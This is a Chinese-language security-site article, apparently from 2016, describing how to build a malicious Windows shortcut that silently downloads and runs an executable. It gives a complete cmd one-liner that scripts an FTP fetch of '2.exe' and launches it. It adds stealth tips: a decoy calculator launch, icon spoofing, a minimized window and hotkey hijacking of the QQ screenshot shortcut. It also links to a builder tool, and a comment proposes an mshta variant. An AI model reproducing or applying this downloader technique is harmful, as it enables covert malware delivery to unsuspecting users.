Windows小工具:LnkDown快捷方式加载Payload

2016-10-06 373123人围观 ,发现 29 个不明物体 系统安全

前言

还是要感谢下FREEBUF上次的小礼物,灰常喜欢。

之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行,要知道PowerShell在03之前是没有默认安装的,也就是说在默认未装载的PC上就然并卵了。

1.jpg

快捷方式木马并非神马新鲜玩意,但大多集中于流氓网页,正常程序快捷方式遭到恶意文件替换(本来打开的QQ想撩妹,结果弹出苍老师的播放器),如何利用快捷方式(不调用PowerShell的情况下实现)实现下载某个文件并运行呢?聪明的你想到cmd多命令执行了吗?whoami&&netuser??至于下载文件,既然可以cmd多命令执行了,当然可以利用ftp下载文件了,有了思路就动手吧!

基本思路

逻辑

1. Echo写出ftp信息,使用ftp –s:x 参数运行下载命令

2. 语句使用&&链接,语句被执行才会继续下一步操作

3. 最后执行恶意程序时使用if exist判断恶意程序是否下载,如果下载则执行

2.jpg

思路验证

echo open127.0.0.1>f&&echo 123>>f&&echo321>>f&&echo get 2.exe>>f&&echobye>>f&&ftp -s:f&&del /q f&&if exist 2.exe start2.exe

CMD下运行正常,但写到快捷方式,显然需要修改一下,首先必须加入/c执行,否则会卡出黑屏不退出(这么不尊重被攻击者,脑子是不是被踢了),在下载前运行一个正常的程序,免的被发现,例如calc.exe&&下载运行命令,然后你总得更改下图标吧大哥,其次既然是在后台静默下载运行,我们当然不想快捷方式一闪而过,创建完快捷方式右键修改运行方式最小化,OK一个简单lnk下载者就成了。

3.jpg

奇技淫巧

如果你右键查看,细心的朋友已经注意到有一个快捷键的选项,快捷方式的快捷方式,他是个无公害的功能,如果被恶意替换冲突某些程序的快捷方式呢?例如QQ的Ctrl+Alt+A截屏快捷键,毕竟是失传已久的“隔空怀孕”,难免有射不准的时候,多测试几次找找规律!

4.jpg

自动工具

每次创建都尼玛要写一长串cmd命令,就算不烦也难免写出的时候啊,结合上面的实验写了一个小工具,纯属方便用的,附上小工具:LnkDown.exe

链接: https://pan.baidu.com/s/1mie0mko 密码: 5dxi

防御:远离黑客,珍爱生命!

*原创作者:键盘手,转载请注明来自FreeBuf(FreeBuf.COM)

更多精彩
相关推荐

这些评论亮了

  • wanjumuma@163.com 回复
    居然还叫键盘手,你这个冒牌货让我情何以堪。。

    这个方法忒垃圾,还要弄ftp服务器下载文件多麻烦。
    直接把lnk文件后面接上html脚本,html里面包含2进制数据,用mshta就可以随便执行2进制了。。
    )44( 亮了
  • ArthurKiller (7级) 窃.格瓦拉驻FreeBuf办事处 回复
    调查:希望FB取消匿名评论的点赞,不希望的可以在下方评论。
    )9( 亮了
  • 喷子天天有,BUF特别多。感谢buf的喷子喷出了心高度,心境界…匿名喷,真心不想与你解释神马,哥们只想说,哥们出来扯皮能赚到稿费,你出来喷水连名字都不敢留,你让我情何以堪啊…我不知我这个网名冒充了哪位大婶的专利,尼玛,有意思吗?最后,哥们真心想交到更多基友一起玩,随便骗点稿费,对于只能躲在黑夜里不尊重别人逮谁喷谁.看见别人骗点稿费就眼红的盆友,你很可悲
    )8( 亮了
发表评论

已有 29 条评论

取消
Loading...

这家伙太懒,还未填写个人描述!

1 文章数 27 评论数 0 关注者

特别推荐

推荐关注

活动预告

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php